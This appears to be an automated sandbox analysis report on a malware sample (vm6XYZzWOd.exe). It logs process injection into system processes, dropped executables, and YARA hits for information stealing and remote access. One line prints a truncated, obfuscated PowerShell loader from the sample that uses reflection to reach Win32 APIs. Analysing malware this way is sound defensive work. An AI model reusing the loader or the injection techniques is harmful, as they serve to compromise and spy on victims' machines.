                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2960000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2C10000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: D80000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6A0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2ED0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 800000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: BC0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: A00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: A00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2500000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2AE0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1010000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2DF0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2480000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1100000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: A00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2CD0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 22C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A60000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1260000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 850000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: ED0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1360000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2BB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 890000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1210000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2630000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2550000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9E0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2400000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 20E0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1020000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 14E0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1140000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: BB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 13D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Local\Temp\$778e373e base: F70000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe base: 7460000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F675170000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Local\Temp\$77eec42d base: E50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wscript.exe base: 1F008260000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe base: 75B0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000Jump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess created: C:\Users\user\AppData\Local\Temp\$77a3a3b4 "C:\Users\user\AppData\Local\Temp\$77a3a3b4"Jump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess created: C:\Users\user\AppData\Local\Temp\$778e373e "C:\Users\user\AppData\Local\Temp\$778e373e"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a7581e3a-9da7-4299-b4e9-0d87c1c78a48}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe "C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess created: unknown unknown
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:ukpewrgeipej{param([outputtype([type])][parameter(position=0)][type[]]$difffpdugehihq,[parameter(position=1)][type]$pcksoxtjin)$dnnozxtgtcr=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+''+[char](102)+''+'l'+''+[char](101)+''+[char](99)+''+'t'+''+[char](101)+'dd'+'e'+''+[char](108)+''+[char](101)+'g'+[char](97)+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+[char](77)+'e'+'m'+''+'o'+'r'+[char](121)+''+[char](77)+''+'o'+''+'d'+''+[char](117)+''+'l'+''+'e'+'',$false).definetype(''+'m'+''+'y'+''+[char](68)+''+'e'+'l'+[char](101)+''+[char](103)+'a'+[char](116)+''+[char](101)+''+[char](84)+''+[char](121)+''+'p'+''+[char](101)+'','c'+[char](108)+''+'a'+'s'+'s'+''+','+'p'+'u'+''+[char](98)+''+'l'+''+'i'+'c'+[char](44)+'s'+'e'+'a'+[char](108)+''+[char](101)+'d'+[char](44)+''+[char](65)+''+'n'+''+'s'+''+[char](105)+''+[char](67)+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+''+[char](44)+'a'+'u'+''+[char](116)+''+[char](111)+''+'c'+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$dnnozxtgtcr.defineconstructor('r'+[char](84)+''+[char](83)+''+[char](112)+''+[char](101)+''+[char](99)+''+'i'+''+[char](97)+''+[char](108)+''+'n'+''+[char](97)+''+[char](109)+''+'e'+','+[char](72)+''+'i'+''+[char](100)+''+[char](101)+'by'+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+'pu'+[char](98)+''+[char](108)+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$difffpdugehihq).setimplementationflags(''+'r'+''+[char](117)+''+'n'+'tim'+[char](101)+''+[char](44)+''+[char](77)+''+'a'+''+[char](110)+''+'a'+''+[char](103)+''+[char](101)+''+[char](100)+'');$dnnozxtgtcr.definemethod(''+[char](73)+'n'+[char](118)+''+[char](111)+''+[char](107)+'e','p'+[char](117)+''+'b'+'l'+[char](105)+''+[char](99)+''+[char](44)+'h'+[char](105)+''+[char](100)+''+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+''+'g'+''+','+''+[char](78)+''+'e'+''+[char](119)+''+'s'+''+[char](108)+''+[char](111)+'t,'+[char](86)+''+[char](105)+''+[char](114)+''+[char](116)+''+[char](117)+''+[char](97)+''+'l'+'',$pcksoxtjin,$difffpdugehihq).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+[char](116)+'i'+'m'+''+[char](101)+','+[char](77)+''+[char](97)+'n'+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');write-output $dnnozxtgtcr.createtype();}$lvayyyanuycks=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('s'+[char](121)+'st'+[char](101)+''+'m'+''+[char](46)+''+[char](100)+''+[char](108)+''+[char](108)+'')}).gettype(''+[char](77)+'i'+'c'+''+[char](114)+'o'+'s'+''+[char](111)+''+'f'+''+[char](116)+''+'.'+''+[char](87)+''+'i'+''+'n'+'3'+[char](50)+''+[char](46)+''+[char](85)+'
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_00000001400022F8 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,7_2_00000001400022F8
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_00000001400022F8 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,7_2_00000001400022F8
                      Source: winlogon.exe, 00000008.00000000.2327070503.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.3596102111.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000000.2333869328.0000011605AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: winlogon.exe, 00000008.00000000.2327070503.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.3596102111.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000000.2334184005.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: winlogon.exe, 00000008.00000000.2327070503.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.3596102111.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000000.2334184005.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: winlogon.exe, 00000008.00000000.2327070503.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.3596102111.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000000.2334184005.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FD6CA6 cpuid 6_2_00FD6CA6
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeQueries volume information: C:\Users\user\Desktop\vm6XYZzWOd.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeQueries volume information: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_00000001400022F8 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,7_2_00000001400022F8
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FD64E3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00FD64E3
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_0040132F VirtualAlloc,VirtualAlloc,CreateEventA,GetUserNameExA,GetVolumeInformationA,select,LocalAlloc,socket,socket,setsockopt,CreateThread,CloseHandle,VirtualFree,VirtualFree,ExitProcess,6_2_0040132F
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: dllhost.exeBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.55615b0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.55815d0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.55815d0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.55c15f0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.7060000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.55615b0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.7060000.17.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.55c15f0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2329340296.0000000007060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2314321944.0000000006431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2314321944.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2302555249.0000000005201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 21.2.$77Kaxhwswfup.exe.38c1cd8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.3c166a4.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.$778e373e.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.3b9b930.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.$77Kaxhwswfup.exe.3937f28.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.$778e373e.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.$77Kaxhwswfup.exe.392dd50.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.3a3eeb4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.3a7f554.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000015.00000002.2746243713.0000000003935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2300253783.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3549120437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.55615b0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.55815d0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.55815d0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.55c15f0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.7060000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.55615b0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.7060000.17.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.55c15f0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2329340296.0000000007060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2314321944.0000000006431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2314321944.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2302555249.0000000005201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 21.2.$77Kaxhwswfup.exe.38c1cd8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.3c166a4.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.$778e373e.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.3b9b930.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.$77Kaxhwswfup.exe.3937f28.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.$778e373e.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.$77Kaxhwswfup.exe.392dd50.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.3a3eeb4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.vm6XYZzWOd.exe.3a7f554.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000015.00000002.2746243713.0000000003935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2300253783.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3549120437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
